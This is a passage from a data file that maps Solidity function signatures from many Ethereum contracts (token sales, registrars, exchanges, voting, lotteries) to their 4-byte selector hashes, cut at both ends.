"0x983b94fb", "cancelBid(bytes32)": "0xdf7cec28", "unsealBid(bytes32,address,uint256,bytes32)": "0xaefc8c72", "newBid(bytes32)": "0xce92dced", "shaBid(bytes32,address,uint256,bytes32)": "0x22ec1244", "startAuctions(bytes32[])": "0xe27fe50f", "startAuction(bytes32)": "0xede8acdb", "getMode(bytes32)": "0x03985426", "strlen(string)": "0x367bbd78", "Registrar(address,bytes32)": "0xa06cab79", "destroyDeed()": "0x0b5ab3d5", "closeDeed(uint256)": "0xbbe42771", "setBalance(uint256)": "0xfb1669ca", "setRegistrar(address)": "0xfaab9d39", "Deed()": "0x24804cef", "addGasEther()": "0x4e077f2a", "claimEtherSigner(uint256)": "0xa2a8336f", "claimEtherOwner(uint256)": "0x32afa2f9", "uintInArray(uint256,uint256,int256,uint256[],uint256)": "0x57a373a1", "HardwareToken()": "0xbb8be064", "availableVolume(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32)": "0xfb6e155f", "testTrade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,address)": "0x6c86888b", "trade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256)": "0x0a19b14a", "order(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x93f0bb51", "balanceOf(address,address)": "0xf7888aec", "withdrawToken(address,uint256)": "0x9e281a98", "depositToken(address,uint256)": "0x338b5dea", "EtherDelta(address,uint256,uint256)": "0x36f66528", "destroy(address,uint256)": "0xa24835d1", "create(address,uint256)": "0x0ecaea73", "setMinter()": "0x9b5adea2", "add_account(address,address)": "0x32fefb4c", "create_account()": "0x509f8633", "claimEther(uint256)": "0x49407a44", "resultsWeightedByEther()": "0x9dcb5c65", "resultsWeightedByTokens()": "0x9832ee65", "results()": "0xa48bdb7c", "removeVote()": "0x49aa4ee2", "voteNo()": "0x41c12a70", "voteYes()": "0x90cf581c", "Vote(string)": "0x323082d7", "refillGas()": "0xe53e04a5", "forceReturn()": "0x7a427d98", "addTokensToGive(address)": "0x200ebe34", "addMessage(string)": "0x6a226a49", "readMessages(uint256)": "0xfff3c457", "burnUnicornShares()": "0x27e8c2d8", "releaseUnicorn(uint256)": "0xff556ecb", "lockUnicorn(uint256)": "0xc26aa3c9", "UnicornMilker()": "0x8f2c44a2", "someFunction()": "0x35b09a6e", "TestToken()": "0xfd7ac203", "balanceEtherAddress(address)": "0xcd9f05b8", "balanceEther(uint256)": "0xe5bf93b9", "balanceEther10000000(uint256)": "0x1e9ea66a", "addEther()": "0x8894dd2b", "addMe()": "0x0d2560ee", "Tester()": "0xb76e4890", "addressInArray(address,address)": "0xfa9acb05", "mintAll(int256)": "0x13df7091", "UnicornMilk()": "0x88782386", "getAttributes(address)": "0x446d5aa4", "getAttributes()": "0x152583de", "getLastOfferId()": "0x59e148fc", "simulatePathwayFromBeneficiary()": "0xc1246d39", "buyViaJohan()": "0x8ac0ca36", "address(address,address,uint256)": "0x1f5d0b4c", "executeProposal(uint256,bytes32)": "0x0b811cb6", "fadd()": "0x428840f6", "_ERC20Contract()": "0xb9dda7b8", "crossForkCount()": "0x8f4fde42", "amountFundHolder()": "0x7de976dc", "limitTier3()": "0xaef08617", "invadeAddress()": "0x2357cd3b", "capPreSale()": "0xfdb914e2", "whitelistAdmin()": "0x4adbe551", "teamAddr()": "0x4a5ff749", "rootAuthority()": "0x61fe51a1", "stakeMaxAge()": "0xe1c3bac6", "mainPlayer()": "0xd10aee9c", "preferredSaleStartTime()": "0x93d68cfa", "actual_feedin()": "0xfc10655e", "airLimitCount()": "0xe779a8cf", "gas()": "0x6ca7c216", "run1()": "0xf983c0fa", "tixPromoDeposit()": "0x11c57757", "startLockUpSec()": "0x6df83012", "TradeId()": "0xc712f3b3", "hint()": "0xfbf552db", "newOwnerTemp()": "0xf4559619", "sumPrice()": "0x655012a9", "sealTimestamp()": "0x4e51193b", "configPerFund()": "0xa37a3859", "lastBlock_v0()": "0x381ee645", "INITIAL_GLOBAL_DAILY_SUPPLY()": "0x5d766d35", "crowdSaleState()": "0xf9bb656b", "crowdsaleStarted()": "0x809ef92f", "valuePerToken()": "0xa8fa8e52", "checkaddress()": "0xbac7bb9f", "istransferAllowed()": "0xfa85d33e", "getWager()": "0xd5656ccf", "athleteCanClaimPercent()": "0xef303553", "Devpr()": "0x1ecb450e", "minCompositionFee()": "0xc73ec2eb", "coinValue()": "0x2a3d30c2", "STARTING_BANKER()": "0xe6bcc297", "INVESTORS_TOKENS_RESERVED()": "0x4fe2f085", "secondTimeLine()": "0x77d4e5bc", "totalEthereumRaised()": "0x4e195faf", "MAX_FUNDS_RAISED_DURING_PRESALE()": "0x6dea2088", "ethInvestedDuringICO()": "0x5ccb5460", "tokenDistributor()": "0x18a6bc32", "market2018TokenCreated()": "0x561a28df", "kingContract()": "0x56b558d3", "TierAmount()": "0x7992e39f", "weiMinimumAmount()": "0x38310f49", "startBuyBackOne()": "0x44af11a3", "latestPhaseNumber()": "0x17c32a58", "totalTokenSaleCap()": "0x9166a449", "daysnumber()": "0x6e754efb", "totalTxVolume()": "0x2d1c56a9", "_price_tokn()": "0x61f127dd", "advisorsTokensLock()": "0xe8144c42", "presaleSoldTokens()": "0x269f96c9", "zoLastRefreshTime()": "0xd0cf49e9", "targetToken()": "0x327107f7", "ETH_per_BRA()": "0x361bfc5b", "maxQuanValues()": "0x228cc2aa", "maxTimeBonus()": "0xd8df44fd", "teamc()": "0xfe687b2b", "just50Send()": "0x90fab7ce", "hardcapInEth()": "0x9d61e624", "dateICOEnded()": "0xd2f3b963", "lockedAllocatable()": "0xb839e0d1", "fourthTeamWithdrawal()": "0x48eab053", "ownerRandomNumber()": "0x7b23f37d", "CREATED_STAR4()": "0x32373e25", "contributionMinimum()": "0x4f2d7ab5", "DEV_TAX_DIVISOR()": "0x259c05f5", "reserveTokens()": "0x27ac36c4", "lastBlock_v6Hash_uint256()": "0xf8f96a55", "minSumICOStage5USD()": "0xb4e0b764", "secondExchangeRate()": "0x961a16f2", "endIcoSaleRound2()": "0x66cf058a", "profiterole()": "0x067906b1", "smallBonusPercent()": "0x6d8941cb", "lpMaxVolume()": "0xf4700d3e", "feePrice()": "0x54ad9718", "TOKEN_EARLYSUPPORTERS()": "0xe3cafbb0", "minAllowedReservingPercentage()": "0xc904a2ee", "third_partner_address()": "0xe0187d18", "Collected_Ether()": "0x6d99aafd", "maxMintProofOfStake()": "0xf2bb5ce1", "crowdfundEndDate()": "0xe1a1cd8d", "TOKEN_SUPPLY()": "0xb152f6cf", "IcoTokens()": "0xdce4fa38", "bountyTokenTimelock()": "0xd9fefd6c", "lastPayoutIndex()": "0xfabfbefb", "initialBountyAmount()": "0xf338c984", "minBetWei()": "0x2d3e2065", "feeReceiverWallet()": "0x655fcaf5", "venue()": "0xa270a737", "MEDIA_SUPPORT_PERCENT()": "0x063ec2f0", "lockedFundsPercent()": "0xdc3a9433", "updateUnsoldTokens()": "0x6bb7f336", "endICOTimestamp()": "0xb823aac7", "lockedUntilTime()": "0xb9bac5f8", "q2()": "0x5615f415", "wlStopBlock()": "0x63de882b", "BTCCCoin()": "0xfbbf119b", "jackpotContract()": "0x4255e808", "expertThreshold()": "0x4d1bc2df", "startAtBlock()": "0x7265d040", "PLATFORM_GROWTH_VESTING_AMOUNT()": "0xb356a3a5", "sentFirst()": "0x040677f1", "supportImpeachment()": "0x0b0b6d5b", "ScaleFactor()": "0xf6f94a85", "w_Team()": "0x5485bb82", "minBuy()": "0x7107d7a6", "startAirdropBy0Eth()": "0x42516f1d", "ownerKillContract()": "0x49714815", "gasForShuffle()": "0x58aaf48a", "contract_sha256()": "0x46b56bf6", "fakeNow()": "0xe41eaa41", "competitionAddress()": "0x56a8a270", "allowDraw()": "0x9dc04184", "saleEndDate()": "0x6affdc39", "packPrice()": "0x335c8b63", "setStopSelling()": "0xcb4b3710", "guardIntervalFinished()": "0x591beea8", "timesfucky()": "0xfc794183", "blnpereth()": "0x2d9b4ab7", "initialSaleContract()": "0x643e7365", "availableZNT()": "0xf1bf18db", "configMaxKeys()": "0x409fb4c0", "tokensContractBalance()": "0x126af4af", "gifted()": "0xb5000405", "premium()": "0xe0a73a93", "preSaleFirstStartDate()": "0x4aae385f", "LSTRatePerWEI()": "0xcd67e55e", "getStageSoldTokens()": "0xab8620dd", "engravedToken()": "0xbf347404", "preIcoTokensSold()": "0x46e2a174", "tokensCreationCap()": "0xe3961174", "GetIsPaused()": "0xf220cbe0", "rateThirdWeekEnd()": "0x51ded741", "managerPrimary()": "0xb777cad7", "SUCCESS_BONUS()": "0x7eb312b1", "seedSupply_()": "0x6802ff77", "totalPrivateSaleStage()": "0x8796a7ba", "gameEarnings()": "0xd6c1be92", "lowLimit()": "0xd70e62eb", "slaveWalletPercentInitialized()": "0x1f2e97c8", "MAX_ICO_GOAL()": "0x5256a36e", "rateMain()": "0x0c119354", "relayer()": "0x8406c079", "lastPayoutTime()": "0x58a1cabf", "shareactive()": "0xd81230c8", "maximumRedeemable()": "0x08b4312b", "croupier()": "0x6b5c5f39", "minMakerBetFund()": "0x10c4b19a", "gymFee()": "0x838985d7", "commissionToWithdraw()": "0x0ee2b0e6", "mintableSupply()": "0xcc5c095c", "successAtBlock()": "0xe09f6f49", "governor()": "0x0c340a24", "yoobaTokenAddress()": "0xd0b68efb", "totalRemaining()": "0xd8a54360", "totalStaticoinSupplys()": "0x4e6944cf", "finalSupply()": "0x2baabbf7", "ethereumLottery()": "0x7826bfa8", "WHITELISTING_MAX_CONTRIBUTION()": "0x9dfb071c", "affiliateProgram()": "0xb3b4fd0f", "ICO_TOKENS_PERCENT()": "0x8d60be98", "maxDays()": "0x29ad27d7", "batchCount()": "0x06f13056", "TRADE_REWARD()": "0xf18166c2", "dragonGirlLotteryNumber()": "0xcace8f37", "USD_PER_ETHER()": "0x9351327f", "PRESALE_LEVEL_1()": "0xe9e55c71", "crowdsaleTokenPriceNumerator()": "0x0622e74b", "TARGET_TOKENS_ADDRESS()": "0x98182950", "BOUNTY_CAMPAIGN_SHARE()": "0xd6030d57", "TBrate()": "0xd5f827e2", "CPCEFund()": "0x5bbb7c42", "_initialSupply()": "0xc3b2d337", "CoreTeamAndFoundersWallet()": "0xbf3e4a79", "periodAmount()": "0xf41e8fc8", "ico2cap()": "0x9bfba3c6", "additionalBonus()": "0x729ef530", "nbMonthsPay()": "0xcc7fa928", "_capLevelEth()": "0xf26baecc", "thirdDueDate()": "0x348508cf", "minimumToRaise()": "0x105ea540", "FINAL_AML_DATE()": "0x69d38ed2", "SALE_IN_PROGRESS()": "0xf02e0b3c", "APP_STORE()": "0xcae5c8c3", "activeTier()": "0x4001261e", "subscriptionRate()": "0xced0c0c2", "atxChangeAddrCount()": "0x3cdb01ae", "REAPER_INTREPID()": "0xe6824b0d", "LOOMIA1()": "0x67441f52", "player1()": "0xd30895e4", "c_MaximumFunds()": "0x3954a389", "XPAAssets()": "0xef3adfb3", "tokenMarketPool()": "0xee35478a", "timerMax()": "0xd9785451", "reserveKY()": "0x7c82a1d4", "getAsset()": "0x5c222bad", "InvestmentAsset(address,address,address,string,string,uint256,uint256,uint256,address)": "0x677ebf2c", "Vote(uint8)": "0x12f4cbd9", "GxAdmins(address)": "0xa737ec3d", "iterateGet(uint256)": "0xefa52fb3", "iterateValid(uint256)": "0x0a0313a9", "iterateStart()": "0xa820b44d", "setStr(string,string)": "0x36805961", "getStr(string)": "0xe449c52a", "setVal(string,uint256)": "0x4a85dbcd", "getVal(string)": "0x3c5a12cb", "_approve(address,uint256,address)": "0xf272404d", "__approve(address,uint256,address)": "0x7b7054c8", "_transferFromWithReference(address,address,uint256,string,address)": "0x22fb5303", "__transferFromWithReference(address,address,uint256,string,address)": "0xec698a28", "_transferWithReference(address,uint256,string,address)": "0x54791f36", "__transferWithReference(address,uint256,string,address)": "0x6a630ee7", "init(address)": "0x19ab453c", "testTransferGas()": "0x7982abf0", "testTransferGasIssue()": "0xf1dfcddb", "testFallbackThenAdd()": "0xe1ba84a9", "testAdd()": "0xae40f72f", "add()": "0x4f2be91f", "sweep(uint256,address,uint256,uint8[],bytes32[],bytes32[])": "0xeb0f2100", "reconcile(uint256,address[],int256[],uint8[],bytes32[],bytes32[])": "0xdf603769", "setTokenContract(uint256,address,uint8[],bytes32[],bytes32[])": "0x59167b9d", "transfer(uint256,address,address[],uint256[],uint8[],bytes32[],bytes32[])": "0xfd764e68", "deleteContract(uint256,uint8[],bytes32[],bytes32[])": "0x24349551", "freezeContract(bool,uint256,uint8[],bytes32[],bytes32[])": "0xd3efbd7f", "updateOwners(uint256,address,address[],uint256,uint8[],bytes32[],bytes32[])": "0xc479ace6", "TokenStorageContract(address,address,address[],uint256,uint256,string,string,uint8)": "0xbd17d63a", "getSecurityValue()": "0x39907af1", "getNonce()": "0xd087d288", "confirmAdminTx(uint256)": "0xdb4d1296", "confirmTransactionSig()": "0xd72c9391", "calculateAdminTxHash()": "0xadf2d029", "calculateHash(address[],uint256[])": "0x92656b6d", "calculateTxHash()": "0xa1d5b36e", "addThing(string,string,string,string)": "0xc4b05f49", "Destructible()": "0x6f024899", "calculateResult()": "0x6e008b35", "notifyAssessors(uint256,uint256)": "0x239ab208", "burnAssessor(address)": "0x23098a9a", "reveal(int128,string)": "0xfadf617b", "steal(int128,string,address)": "0x2ad1bc09", "confirmAssessor()": "0xf571da7f", "callAllFromMew(uint256,address)": "0xe6c50020", "setAssessorPool(uint256,address,uint256)": "0x2fa4f694", "addAssessorToPool(address)": "0xdb7ed9e7", "cancelAssessment()": "0x61eda968", "Assessment(address,uint256,uint256,uint256,uint256)": "0x5d65c37b", "testCreateBallotContract()": "0x1cff3e09", "joinMountain(bytes32,address)": "0xe790aa9e", "addContractMember(address,bytes32,address)": "0xaadbc52d", "createContract(bytes32,uint256,uint256,uint256)": "0x00761731", "SignCurrentVersion(string)": "0x24372fa3", "SignVersion(string,string)": "0x8c9cf205", "ReadContent(string)": "0xf9c113cb", "Rename(string,string)": "0x9dcbf7ea", "CreateVersion(bytes,string)": "0xc839c0de", "bytes32ToString(bytes32,bytes32)": "0x92f5cea7", "GetVersions()": "0xb15868eb", "RemoveSubscriber(address)": "0xf0cf198a", "findSubscriberIndex(address)": "0x4d341bbc", "GetWhoSignedAVersion(string)": "0x1a86535a", "GetSubscribers()": "0x3c2d55e6", "AddSubscriber(address,string,string)": "0x3bc2bc42", "VersionedAgreementControll()": "0xfbeaaed2", "named(bytes32)": "0xa550f86d", "resetListing(string)": "0xda5e4489", "whitelistApplication(string)": "0x234b2cb4", "resolveChallenge(string)": "0x972072a2", "tokenClaims(uint256,address)": "0xa5ba3b1e", "voterReward(address,uint256,uint256)": "0xa7aad3db", "isExpired(uint256)": "0xd9548e53", "challengeWinnerReward(uint256)": "0x50411552", "challengeCanBeResolved(string)": "0xd134f4aa", "challengeExists(string)": "0xe1a566f4", "appWasMade(string)": "0x0f53ba51", "isWhitelisted(string)": "0xb48eea44", "canBeWhitelisted(string)": "0xc53c614d", "claimReward(uint256,uint256)": "0x86bb8f37", "challenge(string)": "0x58f5382e", "exit(string)": "0xe7fb5388", "withdraw(string,uint256)": "0x30b39a62", "deposit(string,uint256)": "0x8e27d719", "apply(string,uint256)": "0xbfa535c7", "Registry(address,address,address)": "0xa91fc821", "getCreditLedger(uint256)": "0xa8740a71", "getCredit(address,address)": "0x585a8aba", "runCredits()": "0x00f6ca59", "createCredit(uint256,address,uint256)": "0xea4c4388", "PayValsToList(address[],uint256[])": "0x3f67364a", "PayXToList(address[],uint256)": "0x7d3b2d81", "AgreementPen(address)": "0x6640ca84", "Sign()": "0xb5d7df97", "testItStoresAValue()": "0x9c03b04f", "drasticMeasure()": "0x9958f045", "normalProcess()": "0xe7651d7a", "PausableMock()": "0xa35d631a", "replaceMultisig(address)": "0xa882d49f", "Razoom(address)": "0xbfe4ed8e", "FixyNetwork()": "0x847e12c4", "WhitePrivilegeToken()": "0x62890063", "GodlyCoin()": "0x0254e687", "CBSToken(string,string,uint8,uint256,uint256,uint256,bool,bool)": "0x89fee530", "HDK_Crowdsale()": "0x6fffffff", "CC()": "0x6509e776", "Flash()": "0x3ab207a3", "SBCE(uint256,uint256)": "0x8a1b991d", "SENIUM()": "0x3d9ad7ce", "getTokenPrice(uint256)": "0xc457fb37", "setupIco(uint256,uint256)": "0x8b259bdb", "setupPreIco(uint256,uint256)": "0xc5e7b4fe", "Ubecoin()": "0x9bca3596", "totalInvestments(uint256)": "0xa945c5c3", "UbecoinICO()": "0x548942e1", "currentStageTokensRate()": "0xe29caee2", "currentStageTokensCap()": "0x2d68de95", "investmentsOf(address)": "0x33cd3383", "Iou_Token()": "0x839484a7", "changeModerator(address)": "0x46642921", "balance_(address,address)": "0x71a7462e", "PCHAIN()": "0xe3140c51", "Diyflex()": "0x5a10d868", "DIVC()": "0x85b09a01", "MVGcoin(uint256,string,string)": "0x4c26064b", "KStarCoin()": "0xe6891995", "exchangePointToCoin(address,uint256,string)": "0x5565ee7a", "mintToInfluencer(address,uint256,string)": "0xcfff8974", "mintToOtherCoinBuyer(address,uint256,string)": "0x7466e67d", "burn(address,uint256,string)": "0x15f570dc", "mint(address,uint256,string)": "0xd3fc9864", "decreaseApproval(address,uint256,bytes,string)": "0x1a0c3479", "increaseApproval(address,uint256,bytes,string)": "0x7b33e01a", "approve(address,uint256,bytes,string)": "0xe312e00f", "transferFrom(address,address,uint256,bytes,string)": "0x4e2ab933", "checkCap(uint256)": "0xe864fd27", "increaseCap(uint256)": "0x523e9551", "IMTERC20()": "0x37b4f299", "LCToken()": "0x11c12715", "cancelWithdraw()": "0x84b76824", "withdraw(uint256,bytes)": "0x030ba25d", "ImpCore(address)": "0x96dbe56e", "closeDistribution()": "0x786c5065", "ImpToken(string,string,uint256,uint256)": "0x3bbca7b4", "requireNotEmptyAddress(address)": "0x6db4ba51", "nCryptClubShare(address,address,address,address)": "0x12ef934b", "AtacToken()": "0xa1536211", "XZARToken()": "0x600d05ac", "IntegratedMoney()": "0xe58ca07e", "_allocation(address,uint256)": "0x0472f72c", "ExperimentalToken()": "0xf9c9b9de", "INCUToken()": "0x4e521a2a", "CALLGToken(uint256,string,string)": "0x209b7067", "VaultbankToken()": "0x2097e5f0", "isRegulated(address)": "0xcafc0fbd", "ensureRegulated(address)": "0xd123b6e2", "TianZhuCoin()": "0x515134b3", "Citizen()": "0x77f18090", "openTrading()": "0xc9567bf9", "LigerToken(address,address,address,address,address)": "0xe88f4510", "newName(string,string)": "0xbd3d0ecb", "usersGetter()": "0x5e3ba8ac", "WAmlingCoin()": "0xbe4bb31a", "getUserBalancesLastBet()": "0xe49cc6a9", "getUserBalances()": "0xbd6edba5", "getUserBet()": "0x81a2824f", "totalBalanceDown()": "0x142e133f", "totalBalanceUp()": "0x6b281b64", "settleBet(bool)": "0xc2276090", "enterRound(bool)": "0x32a36e53", "recordBet(bool,uint256)": "0x799f7043", "withdrawFromFeeBalance()": "0xeaf03fc5", "changeContractAddress(address)": "0x85a30c33", "PonziBet()": "0x0b513ce9", "LBN()": "0xb25e8973", "Stex()": "0xda9534b4", "setLandLimit()": "0xc0b14de7", "editGardener(uint256,uint256,uint256)": "0x8142b8d7", "addGardener(uint256,uint256)": "0x0b2fce74", "getCrop(uint256)": "0x8bc7fa9c", "_makePlant(address,uint256,uint256)": "0x458da775", "_receiveMakePlant(address,uint256,uint256)": "0x278bee92", "makePlant(uint256,uint256)": "0x44abd790", "freeLandsOf(address)": "0x11308d66", "plantedOf(address)": "0x182493f2", "CandyLand(address)": "0x2eb1ee9e", "bytesToBytes4(bytes)": "0x83c7f14c", "getRank(address,uint256)": "0xf7935969", "getPreSaleRank(address,uint256)": "0x6201510a", "getNextRank(address)": "0xc299a394", "ranksCount()": "0xdfd5dd6b", "getUserLandLimit(address)": "0x57e8f401", "getUserRank(address)": "0xb2d1573f", "getRankTitle(uint256)": "0xb90da496", "getRankLandLimit(uint256)": "0xfedbceba", "getRankPriceCandy(uint256)": "0x91361f64", "getRankPriceEth(uint256)": "0x87da18ee", "getIndividualPrice(address,uint256)": "0xca215005", "initSignetures()": "0x4183689f", "OwnerSigneture(address[])": "0x389439bb", "printListOfBooks()": "0x16b3299d", "finito()": "0x402e46b9", "issueBook(uint8)": "0x7b0a2340", "joinClub()": "0xd6e325ae", "addBook(string,string)": "0xd8a7233e", "_fund(uint256)": "0x233ff4b2", "getProposal(uint256,bytes32)": "0x5c475676", "nProposals(uint256)": "0xb6030d35", "voteProposal(uint256,bytes32)": "0x8c9151ae", "addProposal(uint256,string)": "0x051097ef", "getSeed(uint256)": "0xe0d4ea37", "setVotingMachine(address)": "0xaf8b912d", "test(uint32)": "0xe3cff634", "getProposalOrganization(bytes32)": "0x1702ef0c", "executeProposal(bytes32,int256)": "0x9d4c162d", "reputationOf(address,bytes32)": "0x9588378e", "burnReputation(uint256,address,bytes32)": "0xf81f8bf6", "mintReputation(uint256,address,bytes32)": "0xd29b5d2f", "getTotalReputationSupply(bytes32)": "0xb551c373", "voteWithSpecifiedAmounts(bytes32,uint256,uint256,uint256,address)": "0x39500019", "vote(bytes32,uint256,address)": "0x76124dac", "propose(uint256,bytes32,address)": "0xc1b74ad8", "myfirsttoken()": "0xcf202727", "approvedRatio(uint256)": "0x72f41f11", "_transferToLock(address,uint256,uint256)": "0x2a12b54d", "howManyTokens(uint256)": "0x2823c24d", "RuffToken()": "0xc46c3c68", "createNetwork(string,uint256,uint256,uint256,uint256)": "0x43f58f9f", "confirmWithdrawal(address,string,uint256,string,address)": "0x9f5227c2", "gameStatus(bool)": "0x96382f0b", "Snickers()": "0x733746ba", "transferAll(uint256,address,address)": "0x7b16f7a0", "transferIssuer(uint256,address,address)": "0x5059fad1", "issue(address,address,uint256)": "0xb6139992", "createType(address)": "0xf11079cf", "isStringEq(string,string)": "0x772cb26b", "approvedRatio(string)": "0x0146705b", "claimToken(address,string)": "0x931b3385", "_transferToLock(address,uint256,string)": "0x594b18b5", "transferToLock(address,uint256,string)": "0xe1e902af", "setCrowdsaleRate(uint256)": "0xcffe02cf", "getAllBalances(address)": "0xc53d6ce1", "getRurus(string)": "0x5d666d3c", "MerchantWallet(address,string,address)": "0xd9facc80", "ArjToken()": "0xcd56028f", "echoTest(uint256)": "0x7e4d4653", "getFileByIndex(bytes32)": "0xa5d677ab", "getFileNum()": "0xef9c79da", "addFile(bytes32)": "0x6b318270", "registerWithToken(address,uint256,address)": "0xccfc8729", "registerWithETH(address)": "0xd2f03bf6", "registerWithDAI(uint256,address)": "0xa4619682", "_register(uint256,address)": "0xc8f87d36", "transferKROContractOwnership(address,string)": "0xfa1456a9", "getExchangeGroups()": "0xc31ce93e", "CoquiToken()": "0x24b27fc8", "getUserContractCount(address)": "0xd78724d6", "getUserContract(address,uint256)": "0x1a81c3a2", "addContract(address,address,uint256,string)": "0x1ae8fc87", "MomoToken(address,uint256)": "0x323dc51a", "setSTMPPrice(uint256)": "0xa0354921", "setETHPrice(uint256)": "0xbc7dce06", "getSTMPDecimals()": "0xf1880128", "calcAmount(uint256)": "0xd54b066f", "transferStmpsToOwnerAccount(address,uint256)": "0xbb9fc9ed", "totalClosedContracts()": "0x86869eae", "totalContracts()": "0xa09037a9", "getClosedContract(bytes32)": "0xb3eb3a86", "closeContract(bytes32,bytes32,uint256,uint256,uint64,uint64,bytes32,bytes32,bytes32,uint64)": "0x96c14d92", "createContract(bytes32,uint16,bytes32,uint256,uint64,bytes32,uint64,bytes32,uint64,uint64)": "0x695dcfa4", "removeNode(address)": "0xb2b99ec9", "Sendmoney(uint256)": "0xee720837", "balanceofSTCDR(address)": "0xb3bf07a1", "TotalSTC(uint256,uint256)": "0x320dc63a", "STCBonus(uint256,uint256)": "0x61616292", "burnSTCDR(uint256,uint256)": "0x31434041", "stcOrginalBuy(uint256)": "0x76cba420", "stcMaxBonus(uint256)": "0xca758f42", "PlayChainToken()": "0x9ddd503e", "addUsers(address,uint256)": "0x71c6e049", "RGTOKEN()": "0xf84564f6", "killAllowanceContract()": "0x9000fcaa", "_changeAddress(address)": "0x288169fd", "_setAllowance(uint256)": "0xc1b15e44", "withdrawWhiteList(uint256)": "0xa8681169", "getCooloffPeriod()": "0x5ff3b980", "BerryLakeToken()": "0x0679195a", "MANGGAHTOKEN()": "0xe58f0289", "confirmByC(uint256,string)": "0xf82b2c31", "disapproveByC(uint256,string)": "0xf471e626", "approveByC(uint256,string)": "0xac9663a6", "disapproveByB(uint256,string)": "0xfe31da3b", "approveByB(uint256,string)": "0x092ac9e5", "approveByA(uint256,string)": "0xb72cacde", "SingularityTest8()": "0xe668a547", "sellnow()": "0x102e8b94", "POHD31()": "0x2263ae04", "protectedTransfer(address,address,uint256)": "0xef69f408", "setMinSet(uint256)": "0x0d799734", "Nursicoin()": "0xaa9f5477", "bitSSAToken()": "0xf652badb", "addMoney(uint256)": "0xd0bc1a88", "createDoc(string,string,string,string)": "0x649e3c46", "AXIACOIN(address,address)": "0x95c4e59b", "ProgrammerdaddysToken()": "0x9d6d22b5", "CGCToken()": "0x03b25050", "WCoin(uint256,string,uint8,string)": "0x8391e48d", "USD20TestToken()": "0xd8b3e417", "helloToken()": "0xa8f0fbbd", "setAmbassadorAddress(address)": "0xbafd244f", "setSpenderAddress(address)": "0x6d7a2609", "OMIVIA()": "0x3c126795", "bitikzikToken()": "0x025932fd", "CryptopediaCoin()": "0x8dea60cc", "JMToken()": "0xf9f8b586", "newOK()": "0xbd80d449", "getTheStocksTokens()": "0x32da57cf", "setTSTC(address)": "0xa5512db0", "totalSuply()": "0xa2a96799", "getUser(uint64)": "0xee552390", "createUser(uint256,uint64,uint64)": "0xf60203c6", "UserInfo()": "0x55b8ef5e", "unPauseToken()": "0xadf6e486", "paymentManager(address,uint256)": "0x93183dc9", "changeDiscount(uint8)": "0xec993f3d", "countDiscount(uint256)": "0x2a86eef3", "updateStat(uint256,uint256,uint256,uint8,uint8)": "0x8fee3dab", "unlockTeamTokens()": "0xe2130d1e", "Streamity()": "0x3380104a", "Tremendoustoken()": "0xba15fcaa", "getCET6ById(uint32)": "0x4f4b890a", "getCET4ById(uint32)": "0x3f7aea39", "addCET6(uint32,uint32,uint32)": "0x82f2a164", "addCET4(uint32,uint32,uint32)": "0xc347fe1f", "addDoctor(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint32,uint32)": "0xff2d4b71", "addMaster(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint32,uint32)": "0xdbbb119c", "addUndergraduate(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint32,uint32)": "0xff9e1b38", "FREEDOMCoin()": "0xc776cc42", "Kardanor()": "0xc78a8dfe", "Volks()": "0x36c4a520", "JBartContract()": "0xcbd21f00", "NEWCICO(address)": "0x2414e134", "NEWC()": "0xdac649c8", "CarolToken()": "0x2e69e8c5", "MultiverseToken()": "0xcc3451d6", "setA(uint256)": "0xee919d50", "getProposalNum()": "0xa4276533", "clearProposalNames()": "0xaa5e2500", "Snydertoken()": "0x05c4b3dc", "SotkoCoin()": "0x9e25fd58", "MagnaChain()": "0xb6bdedca", "SHNZ2()": "0x8cbb6593", "singleValueBatchTransfer(address[],uint256)": "0x3f802ca0", "multiValueBatchTransfer(address[],uint256[])": "0x5c20ad9e", "drawNumbers(uint32)": "0x0a3ecdfe", "priceUpdateTimeline()": "0x670c3ac2", "priceTimeToExpiration()": "0x300ac0e9", "priceExpiration()": "0x85d77e5f", "mybUSDPrice()": "0x2e63046d", "ethUSDPrice()": "0x6e18eba5", "stakerIncomeShare(bytes32)": "0xc0797ae1", "stakingExpiration(bytes32)": "0x70183a4d", "escrowExpiration(bytes32)": "0xe743892b", "lockedForAsset(bytes32)": "0x50bc051e", "assetStaker(bytes32)": "0xb22dd140", "depositedMYB(address)": "0x68faecdb", "escrowedMYB(address)": "0x7e39082f", "escrowedForAsset(bytes32)": "0x7a95e305", "managerIncome(address)": "0xb82465e9", "managerPercentage(bytes32)": "0x42fbbc9c", "assetManager(bytes32)": "0x1b45c301", "fundingDeadline(bytes32)": "0x88fcba88", "amountToBeRaised(bytes32)": "0xfb4a86bc", "fundingStage(bytes32)": "0xca922078", "amountRaised(bytes32)": "0x104b78bd", "ownershipUnits(bytes32,address)": "0x3acf4f9f", "getAmountOwed(bytes32,address)": "0xb9b6c2d4", "totalPaidToFunder(bytes32,address)": "0x9271b8df", "totalPaidToFunders(bytes32)": "0x5f7dfd3f", "totalReceived(bytes32)": "0x9317d6d3", "assetIncome(bytes32)": "0xdc20f957", "accessTokenFee(uint256)": "0xc3513132", "isFunctionAuthorized(bytes32)": "0x2a5bfc7b", "getFunctionAuthorizationHash(address,address,string,bytes32)": "0x71a67aa9", "userAccess(address)": "0x89eaa610", "contractAddress(string)": "0x1eb726af", "isPaused(address)": "0x5b14f183", "installerPercentage()": "0x939729c1", "myBitFoundationPercentage()": "0xdb6727c1", "InstallerEscrow()": "0x96cdb027", "MyBitFoundation()": "0x8170733d", "ADMOToken()": "0x157a18b4", "cloneIt()": "0x6439437e", "setFormat(bool)": "0x532f1041", "AacharyaToken()": "0x0cff4058", "OwnerKill()": "0xd39c9afd", "CallBack(string,bytes32)": "0x3c6867c3", "GetData(bytes32,string,bytes32)": "0x642c53e2", "privilegedAccountStatus(address)": "0xa7ebc5bd", "privilegedAddress(uint256)": "0x274c7922", "privilegedAccountsCount()": "0x795e09ef", "removeFromPrivileged(address)": "0x0f57b9d9", "addToPrivileged(address)": "0x20ee5445", "isPrivileged(address)": "0x2e2326d5", "VivekTestToken()": "0xb971a1f8", "getUsernameByIndex(uint256)": "0x0bac9fe7", "getAddressByIndex(uint256)": "0xce10cf88", 